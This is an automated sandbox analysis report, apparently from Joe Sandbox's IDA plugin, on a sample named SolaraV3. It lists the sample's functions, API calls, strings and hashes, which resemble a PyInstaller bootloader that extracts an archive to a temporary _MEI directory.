Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
Instruction ID: 520a1df902abe038af48126fdc0ee7bd1311f12a73f8a99ddc235553f6fb8ece
Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
Instruction Fuzzy Hash: 6302DD31E1D64E41FA72AB25982037DAA94BF05BA0F554637DD6DCA3D2DE3CA4738320

Function 00007FF6DC701950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6DC707F90: _fread_nolock.LIBCMT ref: 00007FF6DC70803A

_fread_nolock.LIBCMT ref: 00007FF6DC701A1B

Part of subcall function 00007FF6DC702910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6DC701B6A), ref: 00007FF6DC70295E

Strings

Could not allocate buffer for TOC!, xrefs: 00007FF6DC701B1B
Failed to seek to cookie position!, xrefs: 00007FF6DC7019EE
MEI, xrefs: 00007FF6DC701991
fread, xrefs: 00007FF6DC701A32, 00007FF6DC701B5C
Failed to read cookie!, xrefs: 00007FF6DC701A2B
fseek, xrefs: 00007FF6DC7019F5
Could not read full TOC!, xrefs: 00007FF6DC701B55
calloc, xrefs: 00007FF6DC701A68
Could not allocate memory for archive structure!, xrefs: 00007FF6DC701A61
malloc, xrefs: 00007FF6DC701B22
Error on file., xrefs: 00007FF6DC701B8D

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 75df882cb69919a76d97c614361eef51b2ec2ab8d5059f73c2ac4bb1c74e6529
Instruction ID: 48af358b863a094ba1041e37a2b0a7fbe8ac0a8961aae4652bcf3dc32a0cab23
Opcode Fuzzy Hash: 75df882cb69919a76d97c614361eef51b2ec2ab8d5059f73c2ac4bb1c74e6529
Instruction Fuzzy Hash: 4D81C171A0868A8AEB20DB25D0502BE73B0FF48784F444437E98EC7799DE3DE5A79740

Function 00007FF6DC701600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6DC7016DA
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6DC7017CA
fwrite, xrefs: 00007FF6DC7017D1
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6DC7016A2
fread, xrefs: 00007FF6DC7017E6
Failed to extract %s: failed to open target file!, xrefs: 00007FF6DC70165C
fopen, xrefs: 00007FF6DC701663
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6DC7017DF
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF6DC701742
Failed to create symbolic link %s!, xrefs: 00007FF6DC701622
fseek, xrefs: 00007FF6DC7016E1
malloc, xrefs: 00007FF6DC701749

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: 645a3b5b24f933cc0bab58613a2994309c3e2b32406c1725b0ea23ef8f235f05
Instruction ID: f6a25d392880169f459ce35b928d1bf17b9a9d6a19c3ce52619e96d98dceac57
Opcode Fuzzy Hash: 645a3b5b24f933cc0bab58613a2994309c3e2b32406c1725b0ea23ef8f235f05
Instruction Fuzzy Hash: AD51AE21B0864F86EA20AB2694201BD63A0BF44794F444533EE4DC77DADE3DF567E340

Function 00007FF6DC708660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF6DC703CBB), ref: 00007FF6DC708704
GetCurrentProcessId.KERNEL32(?,00000000,00007FF6DC703CBB), ref: 00007FF6DC70870A
CreateDirectoryW.KERNELBASE(?,00000000,00007FF6DC703CBB), ref: 00007FF6DC70874C

Part of subcall function 00007FF6DC708830: GetEnvironmentVariableW.KERNEL32(00007FF6DC70388E), ref: 00007FF6DC708867
Part of subcall function 00007FF6DC708830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6DC708889

Part of subcall function 00007FF6DC718238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC718251

Part of subcall function 00007FF6DC702810: MessageBoxW.USER32 ref: 00007FF6DC7028EA

Strings

TMP, xrefs: 00007FF6DC70869C, 00007FF6DC7087A3
_MEI%d, xrefs: 00007FF6DC708712
LOADER: failed to set the TMP environment variable., xrefs: 00007FF6DC7086DC
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF6DC70877E
TMP, xrefs: 00007FF6DC7086C2

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
Instruction ID: c3f9c04f3f87d20f91d7bb1442674cb1982467ea68f41431e2d5731548bdd16e
Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
Instruction Fuzzy Hash: 6241C211B1964A44FA25E767A8652FD52A0AF887C0F845233ED0DC77DADE3DE523D700

Function 00007FF6DC701210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF6DC701276
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF6DC70141E
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6DC7012BA
1.3.1, xrefs: 00007FF6DC701249
malloc, xrefs: 00007FF6DC7012C1, 00007FF6DC7012F6
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6DC7012EF

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: ab383ac4b995131bdd40696453c0f16ebeee9cffe796343d9728e2385cbc1d23
Instruction ID: 86cdcb7e46f9813f34b6f86ac8c5fc4ab10b663316dd619ccc43144b47be829d
Opcode Fuzzy Hash: ab383ac4b995131bdd40696453c0f16ebeee9cffe796343d9728e2385cbc1d23
Instruction Fuzzy Hash: 05510822B0864A86E6219B16E4503BEA2A1FF84794F484137ED4EC77D9EF3DE563D700

Function 00007FF6DC71ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF6DC71F0AA,?,?,-00000018,00007FF6DC71AD53,?,?,?,00007FF6DC71AC4A,?,?,?,00007FF6DC715F3E), ref: 00007FF6DC71EE8C
GetProcAddress.KERNEL32(?,?,?,00007FF6DC71F0AA,?,?,-00000018,00007FF6DC71AD53,?,?,?,00007FF6DC71AC4A,?,?,?,00007FF6DC715F3E), ref: 00007FF6DC71EE98

Strings

api-ms-, xrefs: 00007FF6DC71EDD6
ext-ms-, xrefs: 00007FF6DC71EDE9

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction ID: b95b587e12267ab634f70504cc74e22c2a31fd8b6b762ba04f6b51265cf1f776
Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction Fuzzy Hash: 8E412C61B1961A42FB26CB1A982467D63A5BF48BD0F885137DD1DC7384DF3CE42B8300

Function 00007FF6DC7036B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF6DC703804), ref: 00007FF6DC7036E1
GetLastError.KERNEL32(?,00007FF6DC703804), ref: 00007FF6DC7036EB

Part of subcall function 00007FF6DC702C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702C9E
Part of subcall function 00007FF6DC702C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702D63
Part of subcall function 00007FF6DC702C50: MessageBoxW.USER32 ref: 00007FF6DC702D99

Strings

\\?\, xrefs: 00007FF6DC70375A
Failed to convert executable path to UTF-8., xrefs: 00007FF6DC703790
Failed to resolve full path to executable %ls., xrefs: 00007FF6DC703739
Failed to obtain executable path., xrefs: 00007FF6DC7036F3
GetModuleFileNameW, xrefs: 00007FF6DC7036FA

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction ID: 8e8d371c739a9d7afba1c888563e93fcc3cfd58bc6cd68cabf098d7fbe29a052
Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction Fuzzy Hash: DA21C461F1C64A41FE319726E8603BE6260BF98355F804133E66DC26D5EE2DE127D740

Function 00007FF6DC71BA5C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC71BE89

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
Instruction ID: 99c03d8e260e3d2b49d0a7d6baf5f44e17883e53a85fc31120d4f2919f769fe9
Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
Instruction Fuzzy Hash: 3DC138A2A1C78F81E7618B1D90612BD3B54FB81B90F556133EA4E83795CF7CE46B8740

Function 00007FF6DC708570 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6DC708590
OpenProcessToken.ADVAPI32 ref: 00007FF6DC7085A3
GetTokenInformation.KERNELBASE ref: 00007FF6DC7085C8
GetLastError.KERNEL32 ref: 00007FF6DC7085D2
GetTokenInformation.KERNELBASE ref: 00007FF6DC708612
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6DC70862E
CloseHandle.KERNEL32 ref: 00007FF6DC708646

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
Instruction ID: 7dcb2c5d61f5f7b020b30dc55f8cc9d1aceded58e25c981b5d6252f48f0b925e
Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
Instruction Fuzzy Hash: 88215E31A0C64A42EB208B56F55426EE3B0FF857A0F540336EA6D83BE9DE7DD4668700

Function 00007FF6DC7090E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6DC708570: GetCurrentProcess.KERNEL32 ref: 00007FF6DC708590
Part of subcall function 00007FF6DC708570: OpenProcessToken.ADVAPI32 ref: 00007FF6DC7085A3
Part of subcall function 00007FF6DC708570: GetTokenInformation.KERNELBASE ref: 00007FF6DC7085C8
Part of subcall function 00007FF6DC708570: GetLastError.KERNEL32 ref: 00007FF6DC7085D2
Part of subcall function 00007FF6DC708570: GetTokenInformation.KERNELBASE ref: 00007FF6DC708612
Part of subcall function 00007FF6DC708570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6DC70862E
Part of subcall function 00007FF6DC708570: CloseHandle.KERNEL32 ref: 00007FF6DC708646

LocalFree.KERNEL32(?,00007FF6DC703C55), ref: 00007FF6DC70916C
LocalFree.KERNEL32(?,00007FF6DC703C55), ref: 00007FF6DC709175

Strings

D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF6DC709142
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF6DC709183
D:(A;;FA;;;%s), xrefs: 00007FF6DC709157
S-1-3-4, xrefs: 00007FF6DC709121

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction ID: a149f3f94df4df9367260d828c308a77d8474707443fd911e8975ba06f9d8111
Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction Fuzzy Hash: C0214D21A0864A81E610AB11E4252EE6361FF88780F544037EA4D83BD6DF3DD966D740

Function 00007FF6DC71CF60 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DC71CF4B), ref: 00007FF6DC71D07C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DC71CF4B), ref: 00007FF6DC71D107

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction ID: d4086e19ec2e577cb964cee3a3ddfca5792207dcce4a95709d42c44aaaa03619
Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction Fuzzy Hash: 4691E532F1865A89F7619F6994602BD2BA0BB54BD8F14613BDE0E97684DF3CD463CB00

Function 00007FF6DC715628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC715655
CreateFileW.KERNELBASE ref: 00007FF6DC715694
CloseHandle.KERNEL32 ref: 00007FF6DC7156C9

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction ID: f2fcf0d37a12b62c590ca901a2d41bc21c043bd6961b1e52981bf9003430a903
Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction Fuzzy Hash: C341A422E1878683E7548B24D56437D7360FB947A4F10A336E69C43AD5DF7CA5F28740

Function 00007FF6DC70CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6DC70CE0C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6DC70CE20

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6DC70CC60
__scrt_release_startup_lock.LIBCMT ref: 00007FF6DC70CCCE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6DC70CD21

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction ID: 99d89fcde20f4cca788a140a4b8d814005db7b87fff77668cbe51f2059ecb85b
Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction Fuzzy Hash: 15313C21E0C24F45FE24AB66D4623BD56A1AF51384F445037E90EC72D7DE2EB927E342

Function 00007FF6DC719A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF6DC719A2C), ref: 00007FF6DC719A41
TerminateProcess.KERNEL32(?,?,?,00007FF6DC719A2C), ref: 00007FF6DC719A4C
ExitProcess.KERNEL32 ref: 00007FF6DC719A5B

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
Instruction ID: f9d3d3af3294862197e04d87239847d074eec55219d5f89e0c8bff4781cb6d92
Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
Instruction Fuzzy Hash: FBD09210B0870E56FB283F74ACB907C52A67F88B41F14243AD80B86393ED2CB86F8301

Function 00007FF6DC71013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC710180
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC710277

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
